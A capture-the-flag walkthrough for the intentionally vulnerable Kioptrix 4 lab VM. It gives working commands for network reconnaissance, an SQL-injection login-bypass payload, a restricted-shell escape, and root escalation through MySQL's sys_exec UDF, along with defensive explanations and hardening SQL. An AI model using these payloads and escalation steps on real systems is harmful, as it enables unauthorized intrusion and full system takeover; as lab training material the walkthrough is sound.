Rooting Kioptrix 4 Walkthrough


Kioptrix 4 is a boot-to-root (B2R) VM designed for students to practice vulnerability analysis and exploitation. The objective is to root the virtual machine by chaining its vulnerabilities into a full system compromise.

Vulnerabilities Exploited:

  • SQL injection in the website login (the password field is not escaped), giving an authentication bypass
  • Website user password reused for SSH
  • Website connects to MySQL as root with an empty password
  • Restricted shell (lshell) escapable with echo os.system("/bin/bash")
  • lib_mysqludf_sys UDF registered in MySQL, so sys_exec runs operating-system commands with mysqld's privileges

Lab Setup:

  • VMWare workstation for Virtual Machines
  • Kali Linux VM in Bridge mode
  • Kioptrix 4 in Bridge mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap
  • enum4linux
  • ssh and the mysql client on the target



Let's find the target on the LAN with netdiscover (both VMs are bridged onto the same segment):

root@kali:~# netdiscover
IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
              84:3a:4b:5c:f5:54      1      60  Intel Corporate
              00:0c:29:89:0d:50      1      60  VMware, Inc.
              14:a5:1a:c3:5a:cc     14     840  HUAWEI TECHNOLOGIES CO.,LTD

Target VM IP address: the VMware host in the list above (MAC 00:0c:29:89:0d:50); the nmap output below reports the same MAC.

Let's scan the target with nmap to find open ports and the services listening on them. -p- covers all 65535 TCP ports; -A adds version detection, OS detection, default NSE scripts and a traceroute.

root@kali:~# nmap -p- -A
Starting Nmap 7.70 ( ) at 2018-05-30 07:57 EDT
Nmap scan report for
Host is up (0.00035s latency).
Not shown: 39528 closed ports, 26003 filtered ports
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:89:0D:50 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 6h59m58s, deviation: 2h49m43s, median: 4h59m57s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2018-05-30T12:58:29-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT      ADDRESS
1   0.35 ms
OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 44.70 seconds

Nmap Findings:

  • Target is a Linux box (kernel 2.6.x, Ubuntu); the versions on show (OpenSSH 4.7p1, Apache 2.2.8, PHP 5.2.4, Samba 3.0.28a) are all old and worth checking for known issues
  • SSH on port 22
  • Website on port 80
  • Samba on ports 139 and 445, with message signing disabled and a guest session accepted by the smb scripts

With SQL injection we can bypass the login form. checklogin.php (dumped later in this walkthrough) escapes the username with mysql_real_escape_string but drops the password into the query unescaped, so the injection goes in the password field. Logging in as admin gets past the check, but the site has no member page for an account called "admin" (username:password):

admin:garbag' or 1=1 -- -
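Why the payload works, shown as the query checklogin.php actually builds (the file is dumped later in this walkthrough; it escapes the username with mysql_real_escape_string but interpolates the password raw). This is an added illustration, not a query from the original post. The members table and the username/password columns come from the page; the prepared-statement fix at the end is an assumed hardening, and the sample values in it are placeholders.

```sql
-- Form input:  username = admin                 (escaped by mysql_real_escape_string)
--              password = garbag' or 1=1 -- -   (interpolated raw)
-- The quote in the password closes the string literal, "or 1=1" is
-- appended as SQL, and "-- -" comments out the trailing quote that the
-- PHP code adds after $mypassword.
SELECT * FROM members
WHERE username='admin' and password='garbag' or 1=1 -- -'
;   -- terminator on its own line: the "-- -" comment swallows the rest of the line above

-- AND binds tighter than OR, so MySQL evaluates
--   (username='admin' AND password='garbag') OR 1=1
-- and returns every row of members: the login check passes for any
-- username. The page reached afterwards is keyed on the submitted
-- username, which is why "admin" led nowhere and "john" worked.

-- The same payload in the username field does nothing: escaping turns it
-- into a harmless lookup for a user that does not exist.
SELECT * FROM members
WHERE username='admin\' or 1=1 -- -' and password='x';

-- Fix: keep input as data with a server-side prepared statement (assumed
-- hardening, not code from the page). The injected text is now just a
-- string that matches no password.
PREPARE login FROM
  'SELECT username FROM members WHERE username = ? AND password = ?';
SET @u = 'admin';
SET @p = 'garbag'' or 1=1 -- -';   -- a plain literal; '' is an escaped quote
EXECUTE login USING @u, @p;        -- 0 rows: no bypass
DEALLOCATE PREPARE login;
```

The first statement is exactly what the vulnerable PHP sends; paste it into the mysql client on the box (after the root login shown later) to watch the whole members table come back.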

So we need to enumerate user accounts first. Samba is exposed on 139/445, so let's use enum4linux; as its output confirms, the server accepts null sessions (empty username and password), which is what makes the user listing possible.

root@kali:~# enum4linux

Starting enum4linux v0.8.9 ( ) on Wed May 30 08:12:46 2018
|    Target Information    |
Target ...........
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
|    Enumerating Workgroup/Domain on    |
[+] Got domain/workgroup name: WORKGROUP
|    Nbtstat Information for    |
Looking up status of
KIOPTRIX4       <00> -         B <ACTIVE>  Workstation Service
KIOPTRIX4       <03> -         B <ACTIVE>  Messenger Service
KIOPTRIX4       <20> -         B <ACTIVE>  File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
MAC Address = 00-00-00-00-00-00
|    Session Check on    |
[+] Server allows sessions using username '', password ''
|    Getting domain SID for    |
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
|    OS information on    |
Use of uninitialized value $os_info in concatenation (.) or string at ./ line 464.
[+] Got OS info for from smbclient:
[+] Got OS info for from srvinfo:
KIOPTRIX4      Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
platform_id     :  500
os version      :    4.9
server type     :    0x809a03
|    Users on    |
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody      Name: nobody          Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert      Name: ,,,             Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root        Name: root            Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john        Name: ,,,             Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret  Name: loneferret,,,   Desc: (null)
user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]

Three user accounts besides root and nobody: john, robert and loneferret.


Let's bypass authentication again, this time as the real user john (username:password):

john:garbag' or 1=1 -- -

Vulnerability 2 in the list above is password reuse: with john's website password in hand, let's try it over SSH.

root@kali:~# ssh john@
The authenticity of host ' (' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '' (RSA) to the list of known hosts.
john@'s password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ python -c "import pty; pty.spawn('/bin/bash');"
*** forbidden syntax -> "python -c "import pty; pty.spawn('/bin/bash');""
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.

We are presented with a restricted shell. The "forbidden syntax" and "warning(s) left" messages are lshell's, and we are one more forbidden command away from being kicked out, so pick the next command carefully. echo is on the allowed list, and echo os.system("/bin/bash") is a known lshell escape that hands us an unrestricted bash:

john:~$ echo os.system("/bin/bash")
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=115(admin),1001(john)

Privilege Escalation

Next step is to get root. First check what john already has (id, sudo -l). The interesting lead is MySQL: the web app talks to it as root (see the checklogin.php dump below), and if the lib_mysqludf_sys UDF library is installed it registers functions such as sys_exec that run operating-system commands from inside MySQL with whatever privileges mysqld itself has. Let's check whether the library is present.

john@Kioptrix4:~$ whereis lib_mysqludf_sys
lib_mysqludf_sys: /usr/lib/

The database credentials are in /var/www/checklogin.php:

john@Kioptrix4:/var/www$ cat checklogin.php
<?php
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");

// Define $myusername and $mypassword
$myusername=$_POST['myusername'];   // [reconstructed: omitted from the dump on the page]
$mypassword=$_POST['mypassword'];   // [reconstructed]

// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);            // password is NOT sanitised
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword); // this is the injection point

//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");

// Mysql_num_row is counting table row
$count=mysql_num_rows($result);     // [reconstructed]
// If result matched $myusername and $mypassword, table row must be 1 row
if($count){                         // [reconstructed: the page's dump omits the exact comparison]
// Register $myusername, $mypassword and redirect to file "login_success.php"
header("location:login_success.php");
}
else {
echo "Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
}
?>

The database credentials are root with an empty password, i.e. the web app runs every query as the MySQL superuser. Let's log in to MySQL and use sys_exec to add john to the admin group, which on Ubuntu releases of this era gets full sudo from the default sudoers line %admin ALL=(ALL) ALL. (The command below worked, but note that -u root@localhost sends the whole string root@localhost as the username; the intended form is mysql -u root -p.)

john@Kioptrix4:/var/www$ mysql -u root@localhost -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 28
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> select sys_exec('usermod -a -G admin john');
| sys_exec('usermod -a -G admin john') |
| NULL                                 |
1 row in set (0.01 sec)
mysql> exit
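The sequence a practitioner would run in the mysql> session around the sys_exec call, as an added example rather than anything from the original post: confirm the UDF is actually registered, confirm whose privileges it executes with, make the change, verify it, and then what to remove to close the hole. sys_eval is a second function from the same lib_mysqludf_sys library; the example assumes it was registered alongside sys_exec. The webapp account and password in the hardening step are placeholders.

```sql
-- 1. Is lib_mysqludf_sys actually registered? Finding the .so in /usr/lib
--    is not enough; the functions must be listed in mysql.func.
SELECT name, ret, dl FROM mysql.func;
--    expect rows such as sys_exec / sys_eval with dl = 'lib_mysqludf_sys.so'

-- 2. Whose privileges do the commands get? The UDF runs inside mysqld, so it
--    carries the server process's identity, not the web app's.
--    (assumes sys_eval is registered; it returns the command's stdout)
SELECT sys_eval('id');
--    if this shows uid=0(root), every sys_exec call is a root shell

-- 3. The escalation from the walkthrough: put john in the Ubuntu admin group,
--    which the default /etc/sudoers grants full sudo (%admin ALL=(ALL) ALL).
SELECT sys_exec('usermod -a -G admin john');
--    sys_exec's return value is not a reliable success signal (the walkthrough
--    shows NULL), so verify the effect instead:
SELECT sys_eval('id john');

-- 4. Closing the hole afterwards (or in a real deployment): drop the UDFs,
--    stop the web app using root, and give it a least-privilege account.
DROP FUNCTION sys_exec;
DROP FUNCTION sys_eval;
CREATE USER 'webapp'@'localhost' IDENTIFIED BY 'change-me';
GRANT SELECT ON members.members TO 'webapp'@'localhost';
FLUSH PRIVILEGES;
-- Also run mysqld as the mysql user rather than root, so a future UDF cannot
-- hand out root, and set a password for root@localhost.
```

Step 2 is the one worth internalising: the UDF does not care who the web app connected as, only which user the mysqld process runs as, so a root-owned mysqld turns any root-level SQL access into root-level command execution.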

Let's confirm: john is now in admin, so sudo accepts his own password and su drops us to root.

john@Kioptrix4:/var/www$ sudo su
[sudo] password for john:
root@Kioptrix4:/var/www# whoami
root@Kioptrix4:/var/www# id
uid=0(root) gid=0(root) groups=0(root)



